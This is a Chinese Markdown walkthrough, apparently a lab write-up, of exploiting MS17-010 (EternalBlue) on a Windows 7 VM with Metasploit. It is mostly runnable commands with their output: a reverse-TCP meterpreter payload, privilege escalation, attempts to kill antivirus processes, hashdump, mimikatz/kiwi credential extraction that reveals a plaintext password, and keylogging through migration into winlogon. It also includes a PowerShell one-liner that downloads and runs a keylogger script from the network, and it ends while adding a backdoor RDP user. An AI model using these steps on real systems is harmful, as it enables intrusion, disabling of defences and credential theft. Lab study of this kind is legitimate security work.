Skip to content

Latest commit

 

History

History
1337 lines (1002 loc) · 47.8 KB

永恒之蓝ms17-010的利用.md

File metadata and controls

1337 lines (1002 loc) · 47.8 KB

永恒之蓝ms17-010的利用

实验环境:

Kali虚拟机:攻击机

Win7虚拟机:目标机

主要工具:metasploit

##获取meterpreter

  1. 使用关键字17-010在metasploit中查找
msf5 > search 17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

  1. 使用辅助模块auxiliary中的auxiliary/scanner/smb/smb_ms17_010验证是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.8.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。

  1. 利用漏洞反弹shell,获取meterpreter

    360安全卫士会拦截,目标机器不能装360或需关闭360。

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124
lhosts => 192.168.8.124
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.8.124:4444 
[*] 192.168.8.129:445 - Connecting to target for exploitation.
[+] 192.168.8.129:445 - Connection established for exploitation.
[+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.8.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.8.129:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.8.129:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.8.129:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.8.129
[*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400
[-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError

meterpreter > 

##确认用户权限

meterpreter > shell
Process 2132 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>exit
exit
meterpreter > 

可以看到是system权限。

也可以直接在meterpreter中运行getuid查看用户权限:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

##提权

如果不是system权限,可以尝试提权:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

看到"got system via technique..."字样,提权成功。

##关闭杀毒软件

  1. 自定义字典

/usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt中自定义字典,添加需要关闭的杀毒软件进程,如zhudongfangyu.exe、360tray.exe,全部小写。

  1. 关闭杀毒软件
  • killav

不要使用run killav

meterpreter > run post/windows/manage/killav 

[*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
[-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
[*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
[-] Failed to terminate '360Tray.exe' (PID: 3408).
[+] A total of 2 process(es) were discovered, 0 were terminated.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


明明是system权限,进程竟然没有被杀掉,郁闷。

  • powershell

通过shell命令进入到目标机器,然后执行powershell命令开启powershell交互界面,这个时候输入命令无响应,无法通过这种方式在目标机器执行powershell命令。所以采用下面这种方法。

meterpreter > load 
load espia       load kiwi        load peinjector  load sniffer
load extapi      load lanattacks  load powershell  load unhook
load incognito   load mimikatz    load python      load winpmem
meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > help powershell

Powershell Commands
===================

    Command             Description
    -------             -----------
    powershell_execute  Execute a Powershell command string
    powershell_import   Import a PS1 script or .NET Assembly DLL
    powershell_shell    Create an interactive Powershell prompt


meterpreter > powershell_shell 
PS > Get-Process

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
    173      20    13964       9544   117     0.23   1732 360leakfixer
    584      55    99776     105588   317     8.49   3944 360Safe
   1936     152   164724      20452   577    12.62   3408 360Tray
     32       5     1088       3100    49     0.02    696 conhost
     31       5     1084       3108    49     0.05   1448 conhost
    515      12     2100       4360    83     0.50    364 csrss
    574      15    10624      10204   178     2.64    468 csrss
    195      16     4328       6932    57     0.56   1936 dllhost
    126      14    51340      38100   130     1.05   2592 dwm
    706      49    28940      46708   247     7.92   2632 explorer
     64       7     1040       2832    35     0.03   1496 Ext2Srv
      0       0        0         24     0               0 Idle
     40       5      940       2392    21     0.00   1552 imdsksvc
    772      24     4304       8300    45     2.09    572 lsass
    204      10     2768       5024    33     0.11    580 lsm
     50       8      996       2952    47     0.03   1584 metsvc
    148      17     3476       4484    61     0.06   2192 msdtc
    257      22    51456      55128   558     0.30   1608 powershell
    271      22    51200      55432   559     0.22   3936 powershell
    778      55    34844      16556   147     1.06   2076 SearchIndexer
    228      14     5372       6572    44     2.15    556 services
    405      31     9896      14852   163     0.94   3712 sesvc
     30       2      452        776     4     0.12    276 smss
    306      31    10076      13592   137     0.98   1856 SoftMgrLite
    648      54    84828      76780   639     0.90   1284 spoolsv
    508      17     5880       7316    44     1.26    548 svchost
    361      14     4364       7272    46     2.40    688 svchost
    268      16     3840       6712    38     0.34    792 svchost
    472      23    17756      14100    84     3.07    860 svchost
    427      24    66132      68028   162    13.32    940 svchost
   1183      52    20824      24108   408     6.65    984 svchost
    571      35    14256      12320    92     1.93   1144 svchost
    143      15     2612      13328    51     0.34   1292 svchost
    257      30     5788       7968    49     0.53   1332 svchost
     94       8     1648       3592    47     0.02   1916 svchost
    103      13     1872       5000    34     0.14   1992 svchost
    314      41    61952       5296   129     0.73   2916 svchost
    646       0      112        368     3               4 System
    205      16     7412       8980    83     0.27   2504 taskhost
    127      12     3640      13272   112     7.52   3440 taskmgr
    280      23    11824        912   128     1.67   1016 updater
     87      10     5224       3744    62     0.08   1632 VGAuthService
     56       6     1436       2748    39     0.00    748 vmacthlp
    310      25    10320      11500   100     5.88   1688 vmtoolsd
    244      22    10488      15192   125     6.63   2788 vmtoolsd
     82      10     1560       3988    57     0.09    456 wininit
    118      10     2964       5708    66     0.25    520 winlogon
    230      15     7052      10468    52            1208 WmiPrvSE
    382      35    10520      10848   105     1.05   1064 ZhuDongFangYu


PS > Stop-Process 1064
ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
ERROR: ???? ?:1 ??: 13
ERROR: + Stop-Process <<<<  1064
ERROR:     + CategoryInfo          : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
EERROR:     + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR: 
PS > 

现在meterpreter中加载powershell模块,然后执行powershell_shell命令进入交互式powershell界面。通过Get-Process查看到ZhuDongFangYu进程id为1064,然后通过Stop-Process停止进程,还是没有杀掉,持续郁闷。

关闭防火墙

##信息收集

###获取目标主机详细信息

  • run scraper

获取系统信息、环境变量、网络、服务、用户、域、密码哈希等信息。

meterpreter > run scraper
[*] New session on 192.168.8.129:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.8.129:445...
meterpreter > 

  • run winenum

部分结果和run scraper重复。

meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.1.8:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
[*] Checking if PC is a Virtual Machine ........
[*] 	This is a VMware Workstation/Fusion Virtual Machine
[*] 	UAC is Disabled
[*] Running Command List ...
[*] 	running command arp -a
[*] 	running command ipconfig /displaydns
[*] 	running command ipconfig /all
[*] 	running command route print
[*] 	running command cmd.exe /c set
[*] 	running command netstat -ns
[*] 	running command netstat -nao
[*] 	running command net accounts
[*] 	running command netstat -vb
[*] 	running command net view
[*] 	running command net localgroup
[*] 	running command net group administrators
[*] 	running command net session
[*] 	running command net share
[*] 	running command net group
[*] 	running command net user
[*] 	running command net view /domain
[*] 	running command netsh firewall show config
[*] 	running command net localgroup administrators
[*] 	running command tasklist /svc
[*] 	running command netsh wlan show drivers
[*] 	running command gpresult /SCOPE USER /Z
[*] 	running command netsh wlan show networks mode=bssid
[*] 	running command gpresult /SCOPE COMPUTER /Z
[*] 	running command netsh wlan show profiles
[*] 	running command netsh wlan show interfaces
[*] Running WMIC Commands ....
[*] 	running command wmic group list
[*] 	running command wmic service list brief
[*] 	running command wmic netlogin get name,lastlogon,badpasswordcount
[*] 	running command wmic logicaldisk get description,filesystem,name,size
[*] 	running command wmic useraccount list
[*] 	running command wmic netuse get name,username,connectiontype,localname
[*] 	running command wmic nteventlog get path,filename,writeable
[*] 	running command wmic volume list brief
[*] 	running command wmic share get name,path
[*] 	running command wmic netclient list brief
[*] 	running command wmic qfe
[*] 	running command wmic startup list full
[*] 	running command wmic rdtoggle list
[*] 	running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
meterpreter > 

###查看目标主机安装了哪些应用

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on PC

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Advanced Archive Password Recovery                              4.54.110.4540
 Elcomsoft Forensic Disk Decryptor                               1.00.110.1392
 Ext2Fsd 0.69                                                    0.69
 Java 8 Update 121 (64-bit)                                      8.0.1210.13
 Java Auto Updater                                               2.8.181.13
 Java SE Development Kit 8 Update 121 (64-bit)                   8.0.1210.13
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2 (CHS)                            4.7.03062
 Microsoft .NET Framework 4.7.2 (简体中文)                           4.7.03062
 Microsoft Visual C++ 2005 Redistributable                       8.0.61187
 Microsoft Visual C++ 2005 Redistributable (x64)                 8.0.61186
 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523  9.0.30729.7523
 Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219     10.0.40219
 Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219     10.0.40219
 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706     14.15.26706
 Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706     14.15.26706
 Python 2.7.13 (64-bit)                                          2.7.13150
 Python 3.7.3 Add to Path (64-bit)                               3.7.3150.0
 Python 3.7.3 Core Interpreter (64-bit)                          3.7.3150.0
 Python 3.7.3 Development Libraries (64-bit)                     3.7.3150.0
 Python 3.7.3 Documentation (64-bit)                             3.7.3150.0
 Python 3.7.3 Executables (64-bit)                               3.7.3150.0
 Python 3.7.3 Standard Library (64-bit)                          3.7.3150.0
 Python 3.7.3 Tcl/Tk Support (64-bit)                            3.7.3150.0
 Python 3.7.3 Test Suite (64-bit)                                3.7.3150.0
 Python 3.7.3 Utility Scripts (64-bit)                           3.7.3150.0
 Python 3.7.3 pip Bootstrap (64-bit)                             3.7.3150.0
 Python Launcher                                                 3.7.6657.0
 SecureCRT V6.2.3.313 汉化版                                        V6.2.3.313 汉化版
 SilentEye                                                       0.4.1
 Stellar Phoenix JPEG Repair                                     5.0.0.0
 Stellar Phoenix Photo Recovery Professional                     8.0.0.1
 Update for Microsoft .NET Framework 4.7.2 (KB4087364)           1
 Update for Microsoft .NET Framework 4.7.2 (KB4457035)           1
 VMware Tools                                                    10.0.0.2977863
 WinRAR 5.11 (64-位)                                              5.11.0
 Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86    10.1.15254.1
 Windows SDK AddOn                                               10.1.0.0
 搜狗输入法 9.1正式版                                                    9.1.0.2657


[+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
meterpreter > 

###查看目标主机有哪些用户

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 1

Current Logged Users
====================

 SID                                           User
 ---                                           ----
 S-1-5-18                                      NT AUTHORITY\SYSTEM
 S-1-5-21-1244648496-323992457-611466280-1000  PC\XinSai


[+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt

Recently Logged Users
=====================

 SID                                           Profile Path
 ---                                           ------------
 S-1-5-18                                      %systemroot%\system32\config\systemprofile
 S-1-5-19                                      C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                      C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-1244648496-323992457-611466280-1000  C:\Users\XinSai
 S-1-5-21-1244648496-323992457-611466280-501   C:\Users\Guest


meterpreter > 

###抓取用户密码哈希

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
meterpreter > 

格式为用户名:SID:LM哈希:NTLM哈希:::,之后可以使用类似John the Ripper等工具进行破解哈希。

###抓取用户密码明文

meterpreter内置了一些扩展库,可以通过输入load,然后连续按两次TAB键进行查看:

meterpreter > load 
load espia       load kiwi        load peinjector  load sniffer
load extapi      load lanattacks  load powershell  load unhook
load incognito   load mimikatz    load python      load winpmem
meterpreter > load 

  • kiwi模块

加载kiwi模块,然后运行creds_all命令。

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.1.1 20180925 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain  LM                                NTLM                              SHA1
--------  ------  --                                ----                              ----
XinSai    PC      f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
PC$       WORKGROUP  (null)
XinSai    PC         admin

tspkg credentials
=================

Username  Domain  Password
--------  ------  --------
XinSai    PC      admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
XinSai    PC         admin
pc$       WORKGROUP  (null)


meterpreter > 

可以看到用户XinSai的密码为"admin"。

  • mimikatz模块

加载mimikatz模块,然后运行wdigest:

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;816638  NTLM       PC            xman666        mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;372325  NTLM       PC            XinSai         mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;996     Negotiate  WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;48926   NTLM                                    mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)
0;999     NTLM       WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory  WriteProcessMemory 鰾 n.a. (wdigest KO)

meterpreter > 

然而并没有得到密码,翻车。

###流量嗅探

####键盘记录

  • keyscan_dump

Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令:

keyscan_start:开启键盘记录功能

keyscan_dump:显示捕捉到的键盘记录信息

keyscan_stop:停止键盘记录功能

不过在使用键盘记录功能时,通常需要跟目标进程进行绑定。下面我们会将Meterpreter跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。

  1. 绑定进程
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]                                                     
 4     0     System                  x64   0                                      
 240   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 328   320   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 340   908   dwm.exe                 x64   3                                      C:\Windows\system32\Dwm.exe
 384   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 412   320   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 524   412   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 540   412   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 548   412   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 616   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 648   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 712   524   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 744   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 816   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 908   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 960   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 1032  1176  QwdqufeOMpX.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\QwdqufeOMpX.exe
 1088  4060  LogonUI.exe             x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 1112  1176  sQoycPhez.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\sQoycPhez.exe
 1176  524   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1212  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 1268  524   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  
 1320  524   Ext2Srv.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Ext2Fsd\Ext2Srv.exe
 1364  524   imdsksvc.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\imdsksvc.exe
 1412  524   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1456  524   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1584  524   taskhost.exe            x64   3                                      C:\Windows\system32\taskhost.exe
 1732  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 1796  524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  
 1956  524   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           
 1996  648   WmiPrvSE.exe                                                         
 2284  1088  csrss.exe               x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 2408  2732  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2496  2272  explorer.exe            x64   3                                      C:\Windows\Explorer.EXE
 2596  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    
 2668  524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           
 2732  524   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           
 2828  1176  xmutGkHXf.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\xmutGkHXf.exe
 2840  1176  TeyQCXoY.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\TeyQCXoY.exe
 3020  1176  plKeHIXhzUQQ.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\plKeHIXhzUQQ.exe
 3220  1176  maBudFEovnC.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\maBudFEovnC.exe
 3384  1176  wLBliAR.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\wLBliAR.exe
 3456  2912  csrss.exe               x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 3748  816   audiodg.exe             x64   0                                      
 3784  2732  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
 3944  2496  vmtoolsd.exe            x64   3                                      C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4024  1176  dtUmbNlfMa.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\dtUmbNlfMa.exe
 4060  2912  winlogon.exe            x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe

meterpreter > getpid
Current pid: 1176
meterpreter > 


可以看到winlogon.exe的pid为4060,且当前meterpreter的pid为1176。下面进行进程绑定。

meterpreter > migrate 4060
[*] Migrating from 1176 to 4060...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4060
meterpreter > 

绑定成功,且meterpreter的pid已迁移到目标进程。

  1. 键盘监听
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > 

此时在受害者机密登录界面,输入密码进行登录。然后:

meterpreter > keyscan_dump 
Dumping captured keystrokes...
admin<CR>


meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > 

成功捕获了受害者的输入"admin",密码即"admin",最后是回车。

  • keylogrecorder
meterpreter > run keylogrecorder -h

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a log file for later anlysis. To stop capture hit Ctrl-C
Usage:
OPTIONS:

    -c <opt>  Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration.  Default is 2.
    -h        Help menu.
    -k        Kill old Process
    -l        Lock screen when capturing Winlogon credentials.
    -t <opt>  Time interval in seconds between recollection of keystrokes, default 30 seconds.

meterpreter > run keylogrecorder -c 0

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
[*] 	explorer.exe Process found, migrating into 2764
[*] Migration Successful!!
[*] 	explorer.exe Process found, migrating into 928
meterpreter > run keylogrecorder -c 0

[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
meterpreter > 

结果并没有捕获到键盘输入,翻车。

  • Get-Keystrokes

下载powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1,上传到目标主机,然后执行:

PS D:\> Import-Module .\Get-Keystrokes.ps1
PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
PS D:\> 

所有的按键都会被记录到key.log中。

也可以执行如下命令:

PS D:\> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath c:\windows\temp\key.log

##添加新用户

  • run getgui
meterpreter > run getgui -u xman666 -p admin

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
